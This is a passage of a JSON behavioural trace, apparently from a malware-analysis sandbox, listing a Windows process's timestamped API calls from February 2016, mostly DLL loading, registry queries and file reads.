"LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,213", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,213", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,213", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,213", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtOpenFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtOpenFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetDllHandle"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtQueryInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,223", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,223", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,233", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,233", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtReadFile"}, {"category": "misc", "timestamp": "2016-02-16 17:41:35,303", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", 